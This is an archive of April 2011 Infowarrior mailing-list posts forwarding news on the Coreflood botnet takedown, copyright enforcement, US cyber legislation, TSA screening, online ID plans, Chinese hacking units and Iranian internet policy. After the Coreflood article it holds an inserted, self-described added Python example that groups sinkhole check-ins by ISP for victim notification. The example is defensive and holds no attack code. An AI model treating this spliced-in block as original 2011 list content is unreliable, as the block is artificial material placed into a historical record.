From rforno at infowarrior.org Wed Apr 13 19:50:40 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 13 Apr 2011 20:50:40 -0400
Subject: [Infowarrior] - Feds commandeer botnet, issue 'stop' command
Message-ID:

In a first, feds commandeer botnet, issue 'stop' command
By Dan Goodin in San Francisco
Posted in Security, 13th April 2011 23:55 GMT
http://www.theregister.co.uk/2011/04/13/coreflood_botnet_takedown/

For the first time ever, the US government has attempted to take down a botnet by setting up a substitute control channel that temporarily disables the underlying malware running on hundreds of thousands of infected end user computers.

The move, announced Wednesday after federal prosecutors seized domain names, IP addresses and servers operated by the operators, is intended to cut the head off a notorious botnet known as Coreflood, which has infected more than 2 million Windows machines since 2002. During an 11-month period starting in March 2009, Coreflood siphoned some 190 GB worth of banking passwords and other sensitive data from more than 413,000 infected users as they browsed the net, authorities said.
In a step never before taken in the US, federal prosecutors have obtained a court order allowing them to set up a substitute command and control server that will direct infected machines to temporarily stop running the underlying malware. The substitute instructions will have to be issued continuously for the foreseeable future because infected machines are automatically programmed to reload Coreflood each time they are restarted.

"Issuing the stop command to the Coreflood software will further limit the ability of the operators of the botnet to regain control of the botnet through a variety of illegal means," prosecutors wrote in a motion filed Tuesday for a court order to take over the C&C server. "Indeed, failure to issue the stop command will increase the likelihood that the operators of the botnet will be able to successfully regain control of some part of their illicit network."

Prosecutors also obtained an order to log the IP addresses of all computers that report to the substitute C&C server. The government attorneys will then work with the underlying ISPs to track down each end user so he can be informed of the infection and be instructed how to use various antivirus products to disinfect the compromised machine.

According to the court filing, no US law enforcement authority has ever sought court permission to control a seized botnet using a substitute C&C server. Dutch officials took a similar approach last year when they beheaded the Bredolab botnet, another network of infected machines used to steal vast amounts of financial information from its victims.

The novel legal move came in a lawsuit prosecutors filed against 13 Coreflood operators named only as John Does because their true identities are unknown. It accuses them of engaging in wire fraud, bank fraud and illegal interception of electronic communications. The complaint and accompanying motions weren't unsealed until Wednesday, when the temporary restraining order they requested was granted.
The order gives the feds control over two IP addresses (207.210.74.74 and 74.63.232.233) and 29 domain names used to run the Coreflood C&C server. It also grants feds authority to use a "trap and trace" device to capture the IP addresses of the compromised computers.

The motions recited a litany of invasions into the online comings and goings of those infected by the Coreflood malware. They included an unnamed defense contractor in Tennessee. After obtaining the online credentials from the firm's bank account, the operators managed to steal almost $242,000 from the firm after attempting to transfer more than $934,000. A North Carolina investment company lost more than $151,000.

According to security researcher Joe Stewart of Secure Works, Coreflood started out as a platform for launching DDoS, or distributed denial-of-service, attacks, but soon moved on to financial crime. Eventually, the botnet was able to compromise accounts even when they used two-factor authentication schemes such as those that rely on a physical token that generates one-time passwords.

It's impossible to know exactly how many victims have been claimed by Coreflood, because machines are constantly being infected, disinfected, and in some cases, reinfected. While investigators counted 413,710 infected machines from March 2009 to January 2010, the total number of machines that were, or had been, part of Coreflood is more than 2.3 million, with more than 1.8 million of them appearing to be located in the US.

The substitute C&C will be operated by the non-profit Internet System Consortium, with additional assistance coming from Microsoft. PDFs of the government's complaint and TRO motion are here and here.
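The article describes two things the substitute C&C server does: it logs the IP addresses of every machine that reports to it, and those logs are handed to the responsible ISPs so that end users can be notified and disinfected. The block below is an added example written for this list, not code from The Register, the Department of Justice or the Internet Systems Consortium, and it knows nothing about how Coreflood's real check-in protocol looked. It shows the log-processing half of that workflow: reading a constructed sinkhole access log, discarding malformed and non-routable addresses, collapsing repeated check-ins per host (the article notes Coreflood reloads on every restart, so one victim reports many times), and grouping the survivors by ISP with a longest-prefix match against a constructed prefix table. The log format, IP ranges (RFC 5737 documentation space) and ISP names are all assumptions.

```python
"""Aggregate sinkhole check-ins into per-ISP notification lists.

Added example for the Infowarrior list; not code from the article or from
the Coreflood takedown. All log lines, prefixes and ISP names are
constructed placeholders in RFC 5737 documentation address space.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime

# Constructed sample of a sinkhole access log: "<ISO timestamp> <client ip> <request>".
SAMPLE_LOG = """\
2011-04-13T23:55:01Z 198.51.100.23 GET /cmd
2011-04-13T23:55:04Z 203.0.113.7 GET /cmd
2011-04-13T23:56:10Z 198.51.100.23 GET /cmd
2011-04-13T23:57:30Z 192.168.1.5 GET /cmd
2011-04-13T23:58:00Z not-an-ip GET /cmd
2011-04-14T00:01:45Z 203.0.113.200 GET /cmd
2011-04-14T00:03:12Z 198.51.100.23 GET /cmd
2011-04-14T00:04:00Z 192.0.2.44 GET /cmd
"""

# Constructed prefix-to-ISP table. In practice this comes from WHOIS/BGP data.
ISP_PREFIXES = {
    ipaddress.ip_network("198.51.100.0/24"): "Example ISP A",
    ipaddress.ip_network("203.0.113.0/25"): "Example ISP B",
    ipaddress.ip_network("203.0.113.128/25"): "Example ISP C",
}

# Ranges that can never be attributed to an ISP: RFC 1918, loopback, link-local.
# Listed explicitly because the stdlib is_private flag would also exclude the
# documentation ranges this sample uses.
NON_ROUTABLE = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                 "127.0.0.0/8", "169.254.0.0/16")]


def parse_sinkhole_log(text):
    """Return (timestamp, ip) pairs for well-formed lines with routable source IPs."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
            ip = ipaddress.ip_address(parts[1])
        except ValueError:
            continue  # unparsable timestamp or address: skip, never guess
        if any(ip in net for net in NON_ROUTABLE):
            continue  # NAT leakage or misconfiguration, not a notifiable victim
        records.append((ts, ip))
    return records


def summarize_checkins(records):
    """Collapse repeated check-ins per IP into a count plus first/last seen."""
    summary = {}
    for ts, ip in sorted(records):
        entry = summary.setdefault(ip, {"count": 0, "first_seen": ts, "last_seen": ts})
        entry["count"] += 1
        entry["first_seen"] = min(entry["first_seen"], ts)
        entry["last_seen"] = max(entry["last_seen"], ts)
    return summary


def isp_for(ip, prefixes=ISP_PREFIXES):
    """Longest-prefix match of an address against the ISP table."""
    ip = ipaddress.ip_address(ip)
    best = None
    for net, isp in prefixes.items():
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, isp)
    return best[1] if best else "UNATTRIBUTED"


def build_notifications(summary, prefixes=ISP_PREFIXES):
    """Group infected addresses by ISP so each gets one notice listing its hosts."""
    batches = defaultdict(list)
    for ip, info in summary.items():
        batches[isp_for(ip, prefixes)].append(
            {"ip": str(ip), "checkins": info["count"],
             "last_seen": info["last_seen"].isoformat()})
    for hosts in batches.values():
        hosts.sort(key=lambda h: h["ip"])
    return dict(batches)


def run(text=SAMPLE_LOG, prefixes=ISP_PREFIXES):
    """Full pipeline: log text in, per-ISP notification batches out."""
    return build_notifications(summarize_checkins(parse_sinkhole_log(text)), prefixes)


if __name__ == "__main__":
    for isp, hosts in sorted(run().items()):
        print(isp)
        for h in hosts:
            print(f"  {h['ip']:<16} check-ins={h['checkins']} last_seen={h['last_seen']}")
```

The UNATTRIBUTED bucket is deliberate: an address that matches no known prefix still represents a victim, and dropping it silently would understate the infection count the article is careful to caveat. The check-in count per host also gives the operator of a sinkhole a cheap way to see which machines keep coming back after a restart and therefore have not yet been cleaned.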
From rforno at infowarrior.org Wed Apr 13 19:51:58 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Wed, 13 Apr 2011 20:51:58 -0400
Subject: [Infowarrior] - NZ Uses Earthquake As An Excuse To Sneak 3 Strikes Law Through
Message-ID: <776F9C72-0778-4670-AF87-7B8ACCF7022B@infowarrior.org>

New Zealand Uses Earthquake As An Excuse To Sneak 3 Strikes Law Through
from the well-isn't-that-nice dept
http://www.techdirt.com/articles/20110413/10333413881/new-zealand-uses-earthquake-as-excuse-to-sneak-3-strikes-law-through.shtml

You may recall that a few years back, New Zealand politicians tried to sneak through a "three strikes" proposal to kick people offline based on accusations (not convictions) of file sharing. When lots of New Zealanders complained, the Copyright Minister first got angry that anyone wouldn't accept this, but eventually the government was forced to back down. Of course, that was only temporary, as last year the plan came back, with a sneaky provision that said they'd only really implement it if file sharing didn't decrease. The argument was that you couldn't say the law was about kicking people off the internet, because it wouldn't start doing that for a few years.

Of course, that proposal hadn't been touched since last December... and yet suddenly it's being pushed through quickly, to the surprise of many New Zealand politicians who had no idea it was even on the docket. Even more nefarious? Supporters are trying to attach it to an emergency bill related to earthquake recovery efforts in the wake of the Christchurch earthquake. Of course, no politician wants to be seen holding up an earthquake recovery bill. This is the ultimate in underhanded moves by politicians, at the behest of the entertainment industry, to ram through broken policies by attaching it to a separate bill.

Update: Good explanation in the comments showing that this bill wasn't "attached" to the earthquake bill, but rather just put through the same process in parallel.
From rforno at infowarrior.org Thu Apr 14 17:00:57 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Thu, 14 Apr 2011 18:00:57 -0400
Subject: [Infowarrior] - Google unveils 'copyright school'
Message-ID: <4B25D8F1-A97E-41DC-8052-BF59203816C9@infowarrior.org>

Google unveils 'copyright school'
By: Jennifer Martinez
April 14, 2011 09:04 AM EDT
http://dyn.politico.com/printstory.cfm?uuid=2BEC4A16-DF78-4FDD-A796-08883A9C3EC7

Google released a set of tougher copyright policies for YouTube online video users on Thursday, requiring violators to watch a copyright tutorial and pass a test before allowing them to continue using the service.

The search giant has faced mounting criticism from lawmakers and the entertainment industry for not doing enough to combat online copyright infringement. Google's updated policies are intended to better educate users about the online video platform's copyright rules and heighten awareness about protecting copyrights.

In the past, YouTube has posted warnings to users specifying that the use of copyrighted materials - such as movies, music or other copyright works - could lead to termination of their account and possibly monetary damages if the copyright holder decides to sue.

The new updates unveiled Thursday allow users to watch a new tutorial video about YouTube's copyright policies and access a redesigned copyright help center.

In addition, Google instituted new policies for users who are found to have violated YouTube's copyright rules. If YouTube receives a copyright notification about a user's video, the user will have to complete "YouTube Copyright School," which requires watching a tutorial video and passing a quiz to prove the user understands the copyright policies.

Additionally, Google has also created a way for errant YouTube users to redeem themselves.
In certain cases, Google will remove copyright strikes from a user's account if he or she successfully completes its copyright school and has a solid track record of following the rules. Google's general policy is to suspend YouTube users who have three copyright strikes.

"We want to help our users operate within the law and within our guidelines. Requiring that people complete copyright school after receiving a copyright notification means they'll understand why their actions were wrong, come away with a better understanding of the law and be more likely to comply with YouTube's guidelines in future," a YouTube representative said in a statement to POLITICO.

Just last week, lawmakers hammered Google for failing to clamp down on websites that illegally offer copyrighted material and knockoff goods. The search engine is dragging its feet in helping tackle the problem, members of the House intellectual property subcommittee said at the hearing.

This article first appeared on POLITICO Pro at 8:59 a.m. on April 14, 2011.

From rforno at infowarrior.org Fri Apr 15 17:37:55 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 15 Apr 2011 18:37:55 -0400
Subject: [Infowarrior] - WH draft bill expands DHS cyber responsibilities
Message-ID: <4841BE68-A247-4075-BC22-729014051F8C@infowarrior.org>

White House draft bill expands DHS cyber responsibilities
April 15, 2011
By Jason Miller
Executive Editor
Federal News Radio
http://federalnewsradio.com/index.php?nid=35&sid=2345684

Under a White House plan, the Homeland Security Department will have far-reaching oversight over all civilian agency computer networks.

The proposal would codify much of the administration's memo from July 2010 expanding DHS's cyber responsibilities for civilian networks. The White House, however, is taking those responsibilities further, according to a source familiar with the document.
The administration drafted a legislative proposal to give DHS many, if not all, of the same authorities for the .gov networks that the Defense Department has for the .mil networks. Federal News Radio recently viewed a draft copy of the legislative proposal.

"I have to question why the Executive branch is writing legislation," said the source, who requested anonymity because they were not authorized to talk about it. "This is not a proposal or white paper like the White House usually sends to Capitol Hill. This is the actual legislation."

The source said the 100-page document is going through interagency review. DHS sent the document around to agencies late last Friday and asked for comments by Monday. The source said few agencies had time to take a hard look at the document, especially in light of the possible government shutdown.

Sources on Capitol Hill and in government confirmed the White House is working on such a proposal. A DHS spokesman said the agency doesn't comment on pending legislation.

Incorporates Senate cyber bill, OMB memo

The bill would bring together legislative proposals by Sens. Joseph Lieberman (I-Conn.), Susan Collins (R-Maine) and Tom Carper (D-Del.), as well as Office of Management and Budget's memo from July 2010 expanding DHS's authorities.

"The cybersecurity legislation being developed in Congress is a large, complex bill with wide-ranging implications, and several Senate committees are involved in its drafting," said committee spokeswoman Leslie Phillips. "The two primary committees of jurisdiction - Homeland Security and Commerce - completed the bulk of their work last August and ironed out several remaining differences by the end of March this year. However, other committees and the White House are critical to the completion of this bill."

In a statement, Lieberman said, "We have been waiting with great anticipation for the White House to weigh in on the best way to protect the American people from catastrophic cyber attacks.
If the White House is on the same path we're on, the Senate should be able to approve comprehensive cybersecurity legislation this year."

Collins said in a floor statement in February about the new bill that the legislation would make DHS a strong partner in the process of securing agency networks, but the White House will be the central point for all cybersecurity across the government.

The Lieberman, Collins and Carper bill would establish a National Center for Cybersecurity and Communications in DHS.

"It would be located within the Department of Homeland Security to elevate and strengthen the Department's cyber security capabilities and authorities," Collins said. "This Center also would be led by a Senate-confirmed director. The Cyber Center, anchored at DHS, will close the coordination gaps that currently exist in our disjointed federal cyber security efforts. For day-to-day operations, the Center would use the resources of DHS, and the Center Director would report directly to the Secretary of Homeland Security. On interagency matters related to the security of federal networks, the director would regularly advise the President - a relationship similar to the director of the National Counterterrorism Center on counterterrorism matters or the chairman of the Joint Chiefs of Staff on military issues. These dual relationships would give the director sufficient rank and stature to interact effectively with the heads of other departments and agencies, and with the private sector."

A second source said the proposal also gives DHS much of the Federal Information Security Management Act (FISMA) authorities that currently fall under OMB, such as policy development and issuance, and the creation of performance measures, guidelines and training.

The first source said the proposal actually goes further than previous bills and memos. The source said the DHS secretary would have broad authorities and oversight responsibilities similar to what Gen. Keith Alexander has with DoD's U.S. Cyber Command.

DHS oversees all civilian cybersecurity

The bill authorizes DHS, in coordination with OMB, "to exercise primary responsibility of operational aspects of IT security in agencies" that is consistent with OMB guidance. The DHS secretary "shall oversee agency security implementations, the implementation of policies" and compliance with policy and regulatory requirements.

DHS and OMB also would issue "compulsory and binding directives," oversee the implementation of agency information security policies, review agency information security programs, designate a person to receive information on security threats and issues and address incident response.

The bill exempts national security and DoD systems from DHS oversight.

Under one version of comprehensive cybersecurity legislation, DHS would get four senior vice president level executives for cybersecurity. But this latest proposal from the White House would change that by adopting DoD's hiring authorities. The first source said DHS could make direct hires, set compensation rates as necessary and pay additional benefits and incentives. DHS also would establish a scholarship program for employees to pursue college or advanced degrees in cybersecurity, and it reactivates the industry-to-government and government-to-industry exchange program for cybersecurity professionals.

The authorities in the bill are similar to those the Office of Personnel Management approved for DHS in September 2009. DHS received Schedule A authorities for cyber positions.

The proposal also would give DHS a significant role in cyber-related procurements. The source said the language in the bill is "vague" about what kind of role DHS will play.

Google provision around data centers?

Additionally, the source said there is a provision toward the end of the document that could have far-reaching effects.
The provision states: "Prohibition, no law, rule, regulation or order or other administrative action of any state or political subdivision shall require a business entity to house a data center in such state or political subdivision thereof as a condition to certify, licensure or approval in relating to operation of such entity."

The source said the provision means the government can't stop a company from doing business in a state, but if the state is doing a procurement, they can't tell the business to locate a data center in their state. The provision also defines what a data center is and says the language will "promote efficiency and innovation."

The source called it the "Google provision" since the search engine giant hosts its data in centers around the world. There are some exceptions, such as, if the data center is being used only for state business and not shared among users across business sectors.

In addition to federal cybersecurity, the bill goes into details about cyber crime and critical infrastructure security.

For instance, under cyber crime, the proposal would expand the Computer Fraud and Abuse Act to include a series of criminal offenses for cyber attacks and confidentiality abuses. It also would expand the Racketeer Influenced and Corrupt Organizations (RICO) Act to establish criminal penalties for cyber crime.

Under critical infrastructure protection, the bill lets the DHS secretary decide what is critical infrastructure, assess audit systems for cyber resilience and create an industry of third-party accreditors and evaluators to assess private sector owners' and operators' systems for meeting cybersecurity requirements. The proposal also requires the development of voluntary consensus standards by industry, academic and government experts for each sector.

The bill states that owners and operators of critical infrastructure shall develop cybersecurity measures, and a senior accountable official must sign and attest to their implementation.
The bill adds that the form must remain on file and available for review, inspection and evaluations by third-party evaluators.

The bill continues to move through interagency review and there is no stated timetable for moving it to the Hill for formal consideration, sources say.

This story is part of Federal News Radio's daily Cybersecurity Update brought to you by Tripwire.

From rforno at infowarrior.org Fri Apr 15 17:39:45 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 15 Apr 2011 18:39:45 -0400
Subject: [Infowarrior] - TSA looks at people who complain about ... TSA
Message-ID: <65937C80-DDDB-4885-B66F-D2F39066F236@infowarrior.org>

TSA security looks at people who complain about ... TSA security
By Mike M. Ahlers and Jeanne Meserve, CNN
April 15, 2011 12:57 p.m. EDT
http://www.cnn.com/2011/TRAVEL/04/15/tsa.screeners.complain/

Washington (CNN) -- Don't like the way airport screeners are doing their job? You might not want to complain too much while standing in line.

Arrogant complaining about airport security is one indicator Transportation Security Administration officers consider when looking for possible criminals and terrorists, CNN has learned exclusively. And, when combined with other behavioral indicators, it could result in a traveler facing additional scrutiny.

CNN has obtained a list of roughly 70 "behavioral indicators" that TSA behavior detection officers use to identify potentially "high risk" passengers at the nation's airports.

Many of the indicators, as characterized in open government reports, are behaviors and appearances that may be indicative of stress, fear or deception. None of them, as the TSA has long said, refer to or suggest race, religion or ethnicity.

But one addresses passengers' attitudes towards security, and how they express those attitudes. It reads: "Very arrogant and expresses contempt against airport passenger procedures."
TSA officials declined to comment on the list of indicators, but said that no single indicator, taken by itself, is ever used to identify travelers as potentially high-risk passengers. Travelers must exhibit several indicators before behavior detection officers steer them to more thorough screening.

But a civil liberties organization said the list should not include behavior relating to the expression of opinions, even arrogant expressions of opinion.

"Expressing your contempt about airport procedures -- that's a First Amendment-protected right," said Michael German, a former FBI agent who now works as legal counsel for the American Civil Liberties Union. "We all have the right to express our views, and particularly in a situation where the government is demanding the ability to search you."

"It's circular reasoning where, you know, I'm going to ask someone to surrender their rights; if they refuse, that's evidence that I need to take their rights away from them. And it's simply inappropriate," he said.

The TSA says its security programs are informed by real-world situations and intelligence. Indeed, the immigration agent who refused to let the alleged "20th hijacker" into the United States in 2001 later testified that the man's arrogant behavior contributed to his suspicions.

Agent Jose Melendez-Perez told the 9/11 commission that Mohammed al-Qahtani "became visibly upset" and arrogantly pointed his finger in the agent's face when asked why he did not have an airline ticket for a return flight.

But some experts say terrorists are much more likely to avoid confrontations with authorities, saying an al Qaeda training manual instructs members to blend in.

"I think the idea that they would try to draw attention to themselves by being arrogant at airport security, it fails the common sense test," said CNN National Security Analyst Peter Bergen. "And it also fails what we know about their behaviors in the past."
The 9/11 commission's report says that "none of the checkpoint supervisors (on September 11th) recalled the (successful) hijackers or reported anything suspicious regarding their screening."

But, it says, an airline ticket agent that checked in hijacker Mohammed Atta says Atta "reacted negatively when informed in Portland (Maine) that he would have to check in again in Boston." Atta "clenched his jaw and said ... with some irritation, 'They told me one step check-in,'" he recalled. The ticket agent recommended the United States hire "behavior profilers ... the way they do overseas," the report says.

Rafi Ron, former director of security at Tel Aviv's Ben Gurion International Airport, said an arrogant complaint about security is a legitimate factor to consider. But officials also should be suspicious of effusive praise, he said.

"The other end of the spectrum is almost as bad, although it is maybe less offensive," he said.

The TSA is expanding the behavior detection program, formally known as SPOT, for Screening Passengers by Observation Technique. Currently, some 3,000 uniformed behavior detection officers are deployed at about 175 airports. President Obama is calling for an additional 175 such officers in his 2012 budget proposal, and the TSA is expected to spend a total of $1.2 billion on the program over the next five years.

In recent years, the TSA has also expanded the scope of the program. Originally intended to look only for suspected terrorists, the program now also seeks to ferret out possible criminals in airports.

Many details of the program are publicly available. According to a Government Accountability Office report, uniformed behavior detection officers typically work in two-person teams at airport checkpoint lines, looking for behaviors that are on the SPOT checklist, each of which is assigned a numerical value.
The officers sometimes initiate casual conversations with passengers, particularly if a passenger is exhibiting behaviors on the SPOT checklist. In most instances, the Accountability Office said, the conversation resolves the suspicion.

But if both behavior detection officers agree that observed indicators exceed a predetermined numerical threshold, the person is referred to additional screening, which can involve more questioning and physical searches of a person or property.

If the person's behavior escalates, accumulating more points based on the SPOT checklist, the officers can refer the person to local law enforcement for investigation. After the law enforcement investigation, the TSA officials determine whether to allow the passenger to board the flight.

The Department of Homeland Security says the program is successful, telling Congress last week that, in a recent test comparing behavior detection officers to random screening procedures, the officers were 50 times more likely to refer people they checked to local law enforcement, and about 4.5 times as likely to identify people with prohibited items or fraudulent documents. Taken together, such officers are nine times more likely to identify "high risk" passengers than random screening, the department said.

"SPOT identifies high-risk travelers at a significantly higher rate than random screening," Larry Willis of the department's Science and Technology Directorate testified.

But one member of the study's Technical Advisory Committee said the study did not establish the program's scientific validity.

"The advisory committee has not been asked to evaluate the overall SPOT program, nor has it been asked to evaluate the validity of indicators used in the program," Philip Rubin testified to Congress last week. Advisory committee members were not shown the list of behavioral indicators, he said.
"My concern is that if I'm a member of the public and I hear (Willis') testimony, it sounds like the SPOT program has been validated," Rubin told CNN. He said that while large numbers of people were screened, very little criminal activity was detected, and the numbers may not be statistically significant.

"The hit rate is so low on this, it could turn out to be a random glitch," he said.

The Government Accountability Office also criticized the study, saying TSA's records are incomplete and the study is not designed to answer the big question people have about the program: Does it work?

The study "is not designed to fully validate whether behavior detection can be used to reliably identify individuals in an airport environment who pose a security risk," the agency said.

Members of Congress also expressed concern about the number of "false positives" -- people flagged for additional screening that resulted in nothing being found. For every person correctly identified as a "high risk" traveler by (the behavior detection officers), 86 were misidentified, Willis said. At random screening, for every person correctly identified, 794 were misidentified.

The TSA does not track the number of arrests, convictions or exonerations of people that are referred to law enforcement, he said.

The ACLU's German, who has not seen the behavioral indicators list, said he fears the indicators "are being used simply as a proxy for racial profiling or other inappropriate police activities."

The number of people arrested at airport checkpoints for immigration violations suggests the behavior detection officers are profiling, he said. Thirty-nine percent of the 1,083 people arrested during the first four and a half years of the program were arrested because they were illegal aliens, according to the Government Accountability Office.

Experts agree that the fact that there is an extremely small number of terrorists makes it hard to evaluate the effectiveness of behavioral observation programs.
The Accountability Office said it looked at 23 occasions in which 16 individuals -- people later charged with terrorism-related activities -- passed through high-threat airports. None is known to have been identified. But it is not known if the behavior detection officers were working at the time, the agency said.

Stephen Lord of the Accountability Office is recommending the TSA study airport videos of those instances.

"We believe such recordings could help identify behaviors that may be common among terrorists, or could demonstrate that terrorists do not generally display any identifying behaviors," Lord said.

From rforno at infowarrior.org Fri Apr 15 17:42:54 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 15 Apr 2011 18:42:54 -0400
Subject: [Infowarrior] - Obama moves forward with Internet ID plan
Message-ID:

April 15, 2011 11:18 AM PDT
Obama moves forward with Internet ID plan
by Declan McCullagh
http://news.cnet.com/8301-31921_3-20054342-281.html

The Obama administration said today that it's moving ahead with a plan for broad adoption of Internet IDs despite concerns about identity centralization, and hopes to fund pilot projects next year.

At an event hosted by the U.S. Chamber of Commerce in Washington, D.C., administration officials downplayed privacy and civil liberties concerns about their proposal, which they said would be led by the private sector and not be required for Americans who use the Internet.

There's "no reliable way to verify identity online" at the moment, Commerce Secretary Gary Locke said, citing the rising tide of security threats including malware and identity theft that have grown increasingly prevalent over the last few years. "Passwords just won't cut it here."

A 55-page document (PDF) released by the White House today adds a few more details to the proposal, which still remains mostly hazy and inchoate.
It offers examples of what the White House views as an "identity ecosystem," including obtaining a digital ID from an Internet service provider that could be used to view your personal health information, or obtaining an ID linked to your cell phone that would let you log into IRS.gov to view payments and file taxes. The idea is to have multiple identity providers that are part of the same system.

Administration officials plan to convene a series of workshops between June and September of this year that would bring together companies and advocacy groups and move closer to an actual specification for what's being called the National Strategy for Trusted Identities in Cyberspace, or NSTIC.

Left unsaid was that the series of workshops, which will be open to the public, will give the proposal's backers a chance to downplay concerns that it could become the virtual equivalent of a national ID card. During his speech, Locke lashed out at the "conspiracy theory set" who have criticized the proposal. A column in NetworkWorld.com, for instance, called NSTIC a "great example of rampant, over-reaching, ignorant, and ill-conceived political foolishness."

"A top-down strategy for online identity is unlikely to work," Jim Harper, director of information studies at the Cato Institute, said today. "People will not participate in a government-corporate identity project that deviates from their demand for control of identity information, which is an essential part of privacy protection, autonomy, and liberty."

The Commerce Department's National Telecommunications and Information Administration created a YouTube video (above) to reassure Americans that "there is no central database tracking your actions." An FAQ repeats the message.
It's enlisted allies to spread the message, including the Center for Democracy and Technology's Leslie Harris, who wrote in a post on commerce.gov that NSTIC is "not a national ID," but instead represents "a call for leadership and innovation from private companies."

One intriguing feature of today's description of NSTIC released by the White House is that it appears to build on a joint Microsoft-IBM project called Attribute-Based Credentials. (See CNET's previous coverage.) The idea is to use encryption technology to let people disclose less about themselves--ideally, the minimum necessary to complete a transaction.

The NSTIC document gives the example of someone filling a medical prescription online: "The pharmacy is not told (his) birth date or the reason for the prescription. The technology also filters information so that the attribute providers--the authoritative sources of the age and prescription information--do not know what pharmacy (is being used)."

The idea of using encryption technology to protect privacy in this way isn't exactly new. The legendary cryptographer David Chaum, the father of digital cash who's now building secure electronic voting systems, developed some of these ideas in the late 1980s. Dutch cryptographer Stefan Brands more fully developed the concept of limited disclosure digital certificates; Microsoft bought his company in 2008, and released the U-Prove specification last year along with a promise not to file patent lawsuits over its use.

On the other hand, it would be more convenient for law enforcement (not to mention intelligence agencies) if a more traditional, centralized system were used. Sen. Barbara Mikulski, a Maryland Democrat who also spoke today at the Chamber event, seemed to veer a bit off-message--and instead of touting anonymity, she stressed the importance of aiding law enforcement.
Protecting civil liberties is important, Mikulski said. "But the first civil liberty is to be able to have a job, lead a life, and be able to buy what you want in the way we now buy it, which is through credit cards."

"We're going to support the FBI," said Mikulski, who heads the Senate subcommittee that oversees the FBI's funding. "We're going to support the growth of the FBI."

The Obama administration's record on digital identification and authentication is mixed. During the 2008 presidential campaign, President Obama told CNET that "I do not support the Real ID program." But after being elected, Obama has not called for its repeal and his administration said last month that it's working "very closely with the states to assist with implementation."

Another cautionary note comes from a previous public-private partnership that also sought to improve identity-related authentication. The largest company participating in the TSA's registered traveler identification program, Verified Identity Pass' CLEAR, shut down in 2009. Its assets were sold to the highest bidder.

Another concern: Although the White House is describing the NSTIC plan as "voluntary," federal agencies could begin to require it for IRS e-filing, applying for Social Security or veterans' benefits, renewing passports online, requesting federal licenses (including ham radio and pilot's licenses), and so on. Then obtaining one of these IDs would become all but mandatory for most Americans.

"For end-users, online identification has become increasingly cumbersome and complex," says Marc Rotenberg, president of the Electronic Privacy Information Center. "But it remains unclear whether the White House proposal will solve this problem or create new problems. There is the real risk that consolidated identity schemes will lead to 'hyper' identity theft."
From rforno at infowarrior.org Sun Apr 17 10:23:03 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 17 Apr 2011 11:23:03 -0400
Subject: [Infowarrior] - PRC: The 1st Technical Reconnaissance Bureau
Message-ID:

The Mighty 1st Technical Reconnaissance Bureau
http://www.strategypage.com/htmw/htiw/articles/20110417.aspx

April 17, 2011: Chinese Cyber War units have been plundering foreign government and military online data for over five years now. But thanks to Wikileaks, and several other sources, the identity and location of the main Chinese Cyber War operation is now known. The Chinese Chengdu Province First Technical Reconnaissance Bureau (1st TRB) is a Chinese Army electronic warfare unit located in central China (Chengdu), and is the most frequent source of hacking attacks traced back to their source. The servers used by the 1st TRB came online over five years ago, and are still used. The Chinese government flatly refuses to even discuss the growing pile of evidence regarding operations like the 1st TRB.

The 1st TRB is part of the Chinese Army's Third Department, which is responsible for all sorts of electronic eavesdropping. But given the praise showered on the 1st TRB, a lot of valuable data has apparently been brought to Chengdu, and then distributed to the appropriate industrial, diplomatic or military operations. The hacking operation has been so successful that it has obtained more staff and technical resources. As a result, in the last five years, detected hacking attempts on U.S. government and corporate networks have increased by more than six times. Most of these hacks appear to be coming from China. Not all the hacking is done by 1st TRB personnel. A lot of it appears to be the work of Chinese freelancers, often working for pay, but sometimes just to "serve the motherland."
From rforno at infowarrior.org Sun Apr 17 12:30:19 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 17 Apr 2011 13:30:19 -0400
Subject: [Infowarrior] - Iran announces 'halal Internet,' new cyberdefense study program
Message-ID: <98E22EFA-7F17-4021-9C82-F4E8EC22FB68@infowarrior.org>

Iran announces "halal Internet," new cyberdefense study programs
Cyrus Farivar | Featured, Iran
17 Apr 2011
http://internetofelsewhere.com/blog/2011/04/17/iran-announces-halal-internet-and-new-cyberdefense-study-programs/

On Friday, Ali Aghamohammadi, the Ahmadinejad Administration's head of economic affairs, was quoted in IRNA, a state-run news agency, saying that Iran was working on a "halal Internet."

"Iran will soon create an internet that conforms to Islamic principles, to improve its communication and trade links with the world," he said, apparently explaining that the new network would operate in parallel to the regular Internet and would possibly eventually replace the open Internet in Muslim countries in the region.

"We can describe it as a genuinely 'halal' network aimed at Muslims on an ethical and moral level," he said. "The aim of this network is to increase Iran and the Farsi language's presence in what has become the most important source of international communication."

In other Iranian Internet news, the commander of the Iranian civil defence organisation, Gholam Reza Jalali, was also quoted in IRNA on Saturday saying that Iran believes the United States and Israel were behind the creation of the Stuxnet worm.

"Investigations and studies show that the source of Stuxnet originates from America and the Zionist regime," he said.

In the same IRNA interview, Jalali was also quoted as saying that Iran was creating the "1390 Program" -- 1390 being the current year in the Persian calendar -- which would add six cyberdefense master's degree programs and one doctoral program across various Iranian universities.
